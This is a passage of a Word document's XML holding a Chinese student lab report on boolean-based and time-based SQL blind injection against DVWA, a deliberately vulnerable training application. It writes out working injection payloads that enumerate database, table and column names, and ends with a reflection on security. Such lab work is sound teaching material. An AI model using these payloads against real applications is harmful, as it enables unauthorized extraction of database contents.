          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>同理判断后三个字符，最后得到数据库名字是dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后猜解数据库的表名：</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首先猜解数据库中表的数量：</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 xml:space="preserve">1' and (select count(table_name) from information_schema.tables where </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table_schema=database())=1 # 显示不存在</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 xml:space="preserve">1' and (select count(table_name) from information_schema.tables where </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table_schema=database())=2 # 显示存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1570990"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1016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18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="1570990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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说明数据库中共有两个表。</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接着挨个猜解表名：</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 xml:space="preserve">1' and length(substr((select table_name from information_schema.tables where </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table_schema=database() limit 0,1),1))=1 # 显示不存在</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 xml:space="preserve">1' and length(substr((select table_name from information_schema.tables where </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table_schema=database() limit 0,1),1))=2 # 显示不存在</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 xml:space="preserve">…1' and length(substr((select table_name from information_schema.tables where </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table_schema=database() limit 0,1),1))=9 # 显示存在</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说明第一个表名长度为 9。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果如下图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1232535"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5715"/>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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269865" cy="1232535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后同理上文用二分法进行表名的猜解:</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 xml:space="preserve">1' and ascii(substr((select table_name from information_schema.tables where </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table_schema=database() limit 0,1),1,1))&gt;97 # 显示存在</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 xml:space="preserve">1' and ascii(substr((select table_name from information_schema.tables where </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table_schema=database() limit 0,1),1,1))&lt;122 # 显示存在</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 xml:space="preserve">1' and ascii(substr((select table_name from information_schema.tables where </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table_schema=database() limit 0,1),1,1))&lt;109 # 显示存在</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 xml:space="preserve">1' and ascii(substr((select table_name from information_schema.tables where </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table_schema=database() limit 0,1),1,1))&lt;103 # 显示不存在</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 xml:space="preserve">1' and ascii(substr((select table_name from information_schema.tables where </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table_schema=database() limit 0,1),1,1))&gt;103 # 显示不存在</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说明第一个表的名字的第一个字符为小写字母 g。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1201420"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1778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20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="1201420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后不断重复上述步骤，我得到了对两个表名的猜解结果：第一个表名是guestbook，第二个表名是users。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后猜解表的字段名：</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首先猜解表中字段的数量：</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 xml:space="preserve">1’ and (select count(column_name) from information_schema.columns where </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table_name= ’users’)=1# 显示不存在</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 xml:space="preserve">1’ and (select count(column_name) from information_schema.columns where </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table_name= ’users’)=8 # 显示存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1326515"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>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21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="1326515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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说明 users 表有 8 个字段。</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接着挨个猜解字段名：</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 xml:space="preserve">1’ and length(substr((select column_name from information_schema.columns where </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table_name= ’users’ limit 0,1),1))=1 # 显示不存在</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 xml:space="preserve">1’ and length(substr((select column_name from information_schema.columns where </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table_name= ’users’ limit 0,1),1))=7 # 显示存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1517015"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6985"/>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22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5268595" cy="1517015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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说明 users 表的第一个字段为 7 个字符长度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后不断重复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>采用二分法，即可猜解出所有字段名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>补充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：如果一个一个猜解其中的字段，那工作量十分巨大，现实的生产环境中可能有几十个字段，所以我们可以猜测其中可能存在的字段。</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我这里举例展示一下：比如在users表中我猜可能会有一个user字段，于是构造下面代码：</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1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1;#</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结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="1209040"/>
            <wp:effectExtent l="0" t="0" r="11430" b="10160"/>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23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="1209040"/>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说明user字段是存在的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用这种方法可以大幅度提高我在盲注时候的工作效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>猜解表中的数据记录：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>依旧和上文相同，先判断长度，再用二分法进行判断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="527" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基于时间的 SQL 盲注：</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使用基于时间的 SQL 盲注，首先判断是否存在注入，注入是字符型还是数字型：</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输入 1’ and sleep(5) #，感觉到明显延迟</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输入 1 and sleep(5) #，没有延迟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2105025"/>
            <wp:effectExtent l="0" t="0" r="4445" b="9525"/>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24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="2105025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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说明存在字符型的基于时间的盲注。</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猜解当前数据库名字长度：</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1’ and if(length(database())=1,sleep(5),1) #没有延迟</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1’ and if(length(database())=4,sleep(5),1) # 明显延迟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2012315"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6985"/>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25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="2012315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>说明数据库的名字长度是4.</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采用二分法猜解数据库名：</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1’ and if(ascii(substr(database(),1,1))&gt;97,sleep(5),1)# 明显延迟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1459230"/>
            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269865" cy="1459230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以此类推，猜解表、字段和数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
        <w:t>心得体会：</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 xml:space="preserve"> 在完成SQL盲注实验的过程中，我深入了解了盲注攻击的原理和方法，并成功地实现了布尔盲注和基于时间的盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</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Hans"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>理解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>盲注攻击原理：在开始实验之前，我花了一些时间仔细学习了SQL盲注的原理。我了解到盲注是一种通过在应用程序与数据库之间的交互中注入恶意SQL代码来获取敏感信息的攻击方法。盲注攻击主要基于推测和判断，通过观察应用程序的反应和推理结果来获取关键数据。</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学习漏洞利用工具：在实施盲注攻击之前，我熟悉了一些常用的漏洞利用工具，如DVWA（Damn Vulnerable Web Application）。DVWA提供了一个实验环境，可以帮助我理解和练习盲注攻击。通过使用DVWA，我能够在一个安全的环境中进行实验，不会对真实系统造成伤害。</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实施布尔盲注：首先，我尝试了布尔盲注攻击。通过构造恶意的SQL语句，并观察应用程序的返回结果，我能够根据返回结果的真假来推断数据库中的信息。这种方法需要耐心和细致的观察，通过不断的试错和推理，最终成功地获取了敏感信息。</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实施基于时间的盲注：接着，我尝试了基于时间的盲注攻击。这种方法利用了应用程序在执行恶意SQL语句时的延迟响应时间来推断数据库中的信息。通过构造带有延迟的SQL语句，并观察应用程序的响应时间，我能够判断恶意SQL语句的执行结果。这需要对延迟时间的敏感觉和实验环境的稳定性。</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总结经验和教训：通过完成这个实验，我学到了许多关于SQL盲注攻击的知识和经验。我意识到了应用程序中的安全漏洞可能导致敏感数据的泄露，因此在开发和部署应用程序时，必须采取适当的安全措施来防止盲注攻击。此外，我还学会了仔细观察应用程序的反应，推理和判断结果的能力对于成功实施盲注攻击非常重要。</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Hans"/>
        </w:rPr>
        <w:t>总的来说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我对盲注攻击的实际操作有了更深入的理解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>必不可免的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>在实验中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我遇到了一些挑战和问题，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>例如像有一些语句教材上给出的语句有问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>但通过仔细观察和不断尝试，我成功地解决了它们。这让我明白了在实施盲注攻击时需要耐心和细心的态度，同时也加深了我的问题解决能力。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我还意识到了应用程序开发和部署中的安全性的重要性。除了技术方面的收获，这次实验还加深了我对团队合作的认识。在实施实验过程中，我与同学们进行了讨论和交流，分享了经验和观点。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楷体">
    <w:altName w:val="汉仪楷体KW"/>
    <w:panose1 w:val="02010609060101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>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070537"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="99070537"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="AC359F9E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AC359F9E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
